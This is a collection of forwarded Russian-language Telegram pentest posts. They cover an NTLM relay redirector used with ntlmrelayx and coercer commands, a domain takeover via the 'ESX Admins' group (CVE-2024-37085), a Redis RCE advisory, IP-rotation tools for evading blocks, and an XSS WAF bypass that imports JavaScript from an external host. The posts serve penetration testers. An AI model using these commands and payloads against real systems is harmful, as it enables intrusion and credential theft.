Forwarded from Похек
Мой коллега-внутрянщик написал очень полезный инструмент PortRevert
#AD #pentest #Microsoft #NTLM #relay
PortRevert — этот инструмент перехватывает SMB трафик на порт 445 и перенаправляет его на порт 4445, позволяя использовать ntlmrelayx без остановки службы LanmanServer (которая слушает порт 445).
➡️ Возможности
- Перехват всего TCP трафика на порт 445
- Перенаправление на порт 4445 для ntlmrelayx
- Автоматическая обработка двунаправленного трафика (запросы/ответы)
- Корректная очистка драйвера при завершении
- Поддержка как x86, так и x64 архитектур
➡️ Использование
Пример использования для NTLM relay
1. Запустите PortRevert от имени администратора:
2. Запустите ntlmrelayx на порту 4445:
3. Принудите жертву к аутентификации любым способом, например с помощью coercer:
➡️ Как это работает
💻 Github repo
🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK
#AD #pentest #Microsoft #NTLM #relay
PortRevert — этот инструмент перехватывает SMB трафик на порт 445 и перенаправляет его на порт 4445, позволяя использовать ntlmrelayx без остановки службы LanmanServer (которая слушает порт 445).
- Перехват всего TCP трафика на порт 445
- Перенаправление на порт 4445 для ntlmrelayx
- Автоматическая обработка двунаправленного трафика (запросы/ответы)
- Корректная очистка драйвера при завершении
- Поддержка как x86, так и x64 архитектур
Пример использования для NTLM relay
1. Запустите PortRevert от имени администратора:
PortRevert.exe
2. Запустите ntlmrelayx на порту 4445:
ntlmrelayx.exe -smb-port 4445 -smb2support -debug
3. Принудите жертву к аутентификации любым способом, например с помощью coercer:
coercer coerce -d cs.org -t dc1 -u test -p 'Password123!' -l pc3 --always-continue
(PortRevert должен быть запущен на хосте-слушателе, в данном случае - pc3)
Жертва -> Порт 445
↓ (перехват PortRedirector)
Жертва -> Порт 4445 -> ntlmrelayx
↓ (ответы)
ntlmrelayx -> Порт 4445
↓ (перенаправление обратно)
ntlmrelayx -> Порт 445 -> Жертва
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2
Forwarded from Proxy Bar
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯2
- Больше 1кк выплат на двух (standoff / bi.zone) платформах
- 24 принятых отчёта
- 67-е место в рейтинге bi.zone
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍2
Forwarded from RedTeam brazzers (Pavel Shlundin)
Что, если ваш пользователь имеет GenericALL на пустую OU? Первым делом в голову приходит нашумевший в Июле dMSA. Но что, если нет DC под управлением WinSrv2025? Кроме обычного вектора по добалению пользователя или компьютера ничего не приходит в голову? А что если я скажу, что в некоторых случаях одно лишь это право может позволить вам взять администратора домена?
Давайте сделаем допущение, что чаще всего компрометация гипервизора влечет за собой компрометацию контроллера домена, т.к. под контроллеры домена редко держат "железные" сервера и очень часто разворачивают DC на гипервизоре. В прошлом году очень незаметно мимо всех нас прошла CVE-2024-37085. Оказывается, если в домене нет группы "ESX Admins" (она автоматически не создаётся), то злоумышленник может создать её сам и таким образом стать администратором домена в один шаг.
Получается очень интересный вектор: у вас есть непривилегированная УЗ, но она имеет GenericAll на пустую OU - создаём в этой OU, например, с помощью ldap_shell, группу ESX Admins, добавляем туда своего пользователя и компрометируем домен через гипервизор.
Давайте сделаем допущение, что чаще всего компрометация гипервизора влечет за собой компрометацию контроллера домена, т.к. под контроллеры домена редко держат "железные" сервера и очень часто разворачивают DC на гипервизоре. В прошлом году очень незаметно мимо всех нас прошла CVE-2024-37085. Оказывается, если в домене нет группы "ESX Admins" (она автоматически не создаётся), то злоумышленник может создать её сам и таким образом стать администратором домена в один шаг.
Получается очень интересный вектор: у вас есть непривилегированная УЗ, но она имеет GenericAll на пустую OU - создаём в этой OU, например, с помощью ldap_shell, группу ESX Admins, добавляем туда своего пользователя и компрометируем домен через гипервизор.
Forwarded from RedTeam brazzers (Миша)
UnderConf.pptx
10.5 MB
Всем привет!
Делюсь презентацией с Underconf :)) запись будет чуть позже
Делюсь презентацией с Underconf :)) запись будет чуть позже
❤4
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2🤯2
Forwarded from Pentest Notes
Подготовил для вас подробное руководство по тестированию на проникновение Outlook Web Access (OWA). 😈
➡️ В статье я разобрал все основные атаки и уязвимости OWA. Собрал и структурировал самое полезное в одном месте.
➡️ Также материал идеально подойдет для тех, кто все еще путает между собой OWA, Outlook и MS Exchange :)
Даже если вы раньше не сталкивались с почтовыми сервисами Microsoft, после прочтения смело можете бежать проверять их на безопасность.🥤
Ссылка на статью
💫 @pentestnotes | #pentest #OWA #Exchange
Даже если вы раньше не сталкивались с почтовыми сервисами Microsoft, после прочтения смело можете бежать проверять их на безопасность.
Ссылка на статью
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4
Forwarded from SecuriXy.kz
🛡️ #RediShell - CVE-2025-49844
CVSS Score: 10.0 (Critical)
13-летняя уязвимость в Lua-парсере Redis позволяет выйти из песочницы Lua и получить RCE на хосте. Оценка экспозиции ~330000 инстансов в сети, около 60000 без аутентификации.
Что делать
1 Обновить Redis до версий с фиксом (например 8.2.2 и выше или эквивалентные патчи для веток)
2 Закрыть доступ Redis из интернета, допускать подключения только из доверенных сетей
3 Включить аутентификацию, запускать Redis от непривилегированного пользователя
4 Если патчить невозможно сразу - временно запретить выполнение Lua-скриптов
🔬 PoC для локальной лабораторной проверки
📎 Источник и разъяснения: BleepingComputer
CVSS Score: 10.0 (Critical)
13-летняя уязвимость в Lua-парсере Redis позволяет выйти из песочницы Lua и получить RCE на хосте. Оценка экспозиции ~330000 инстансов в сети, около 60000 без аутентификации.
Что делать
1 Обновить Redis до версий с фиксом (например 8.2.2 и выше или эквивалентные патчи для веток)
2 Закрыть доступ Redis из интернета, допускать подключения только из доверенных сетей
3 Включить аутентификацию, запускать Redis от непривилегированного пользователя
4 Если патчить невозможно сразу - временно запретить выполнение Lua-скриптов
🔬 PoC для локальной лабораторной проверки
📎 Источник и разъяснения: BleepingComputer
Forwarded from PurpleBear (Vadim Shelest)
Всем привет!
Очень часто во время пентестов внешнего периметра возникает ситуация, когда различные СЗИ блокируют адреса атакующей инфраструктуры в автоматизированном режиме, что немного затрудняет процесс сканирования открытых портов и фазинга директорий и файлов. Концептуальное решение для обхода, такое же очевидное как и сам принцип блокировок, использовать "карусель проксей", чтобы каждый запрос летел с нового source ip😎
Уже давно существуют утилиты с открытым исходным кодом, которые решают эту задачу, например FireProx для использования пула адресов Amazon через
После длинного предисловия, хочу поделиться новым инструментом - FlareProx, для решения этой задачи с использованием пула ip адресов
✅ Утилита на python3, поддерживает все HTTP методы (GET, POST, PUT, DELETE, PATCH, OPTIONS, HEAD)
✅ Огромный пул адресов
✅ Лимит запросов - 100k/ежедневно на бесплатном уровне подписки
Таким образом, у нас в арсенале появился еще один инструмент для обхода блокировок по source ip, который точно не будет лишним на проектах в формате тестирований на проникновение внешнего периметра.
Очень часто во время пентестов внешнего периметра возникает ситуация, когда различные СЗИ блокируют адреса атакующей инфраструктуры в автоматизированном режиме, что немного затрудняет процесс сканирования открытых портов и фазинга директорий и файлов. Концептуальное решение для обхода, такое же очевидное как и сам принцип блокировок, использовать "карусель проксей", чтобы каждый запрос летел с нового source ip😎
Уже давно существуют утилиты с открытым исходным кодом, которые решают эту задачу, например FireProx для использования пула адресов Amazon через
AWS API Gateway, к тому же абсолютно не сложно написать свое кастомное решение😜 Мы в своей практике для этих целей используем Yandex API Gateway, Yandex Cloud Functions и резидентские прокси + немного python в случаях с особо трепетными СЗИ, которые по дефолту блокируют пулы адресов публичных облачных провайдеров.После длинного предисловия, хочу поделиться новым инструментом - FlareProx, для решения этой задачи с использованием пула ip адресов
Cloudflare Workers.✅ Утилита на python3, поддерживает все HTTP методы (GET, POST, PUT, DELETE, PATCH, OPTIONS, HEAD)
✅ Огромный пул адресов
Cloudflare✅ Лимит запросов - 100k/ежедневно на бесплатном уровне подписки
CloudflareТаким образом, у нас в арсенале появился еще один инструмент для обхода блокировок по source ip, который точно не будет лишним на проектах в формате тестирований на проникновение внешнего периметра.
GitHub
GitHub - ustayready/fireprox: AWS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation
AWS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation - ustayready/fireprox
🔥4
Forwarded from Fail Auth
Всем привет!
Довольно часто на проектах попадается Microsoft Outlook Web Access (OWA).
Столкнулся с проблемой установки инcтрумента PEAS, который помогает протестировать ActiveSync (EAS).
EAS - протокол Microsoft для синхронизации мобильных устройств с Exchange Server.
Утилита устарела, написана под Python 2 и требует ручной правки зависимостей.
В итоге решил проблему с помощью docker.
git clone https://github.com/snovvcrash/peas ~/tools/peas-m && cd ~/tools/peas-m
python3 -m virtualenv --python=/usr/bin/python venv && source ./venv/bin/activate
🐳 Создаем Dockerfile внутри директории рядом с файлом requirements.txt
FROM python:2.7-slim
RUN sed -i 's|deb.debian.org|archive.debian.org|g' /etc/apt/sources.list && \
sed -i 's|security.debian.org|archive.debian.org|g' /etc/apt/sources.list && \
apt update && \
apt install -y git build-essential libxml2-dev libxslt1-dev libffi-dev libssl-dev
RUN git clone https://github.com/snovvcrash/peas /opt/peas
WORKDIR /opt/peas
RUN pip install -r requirements.txt
ENTRYPOINT ["python", "-m", "peas"]
sudo docker build -t peas-py2 .
✔️ Запуск и работа с утилитой:
sudo docker run --rm --net=host -v "$PWD/peas-out":/opt/peas/out peas-py2 -u 'DOMEN\test' -p 'Password123' example.com --list-unc='\\DC-name\' --check
Надеюсь, кому-то пригодится!
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4
Forwarded from SHADOW:Group
Недавно попалось приложение, которое не давало мне проэксплуатировать XSS. WAF тригерился на использование большинства функций и ключевых слов, таких как
В таких случаях часто на помощь приходит функция
Для эксплуатации я использовал пэйлоад
Кроме того, с его помощью можно удобно выполнить любой код, указав его через символ
#web #waf #xss
alert, document.cookie и других.В таких случаях часто на помощь приходит функция
import(), которая позволяет подгружать JS-скрипты из внешнего модуля. Более подробно c этой функцией можете ознакомиться в документации.Для эксплуатации я использовал пэйлоад
Javascript:import('//X55.is')// который через import() выполняет загрузку вредоносного JS-модуля, размещенного на сайте X55.is. Данный модуль выполняет обычный alert.Кроме того, с его помощью можно удобно выполнить любой код, указав его через символ
#. Все, что будет после #, не будет видно на сервере, что поможет обойти WAF, а модуль в import считает содержимое из document.location.hash и выполнит код.javascript:import('//X55.is')//#alert('shdw')#web #waf #xss
🔥5👍1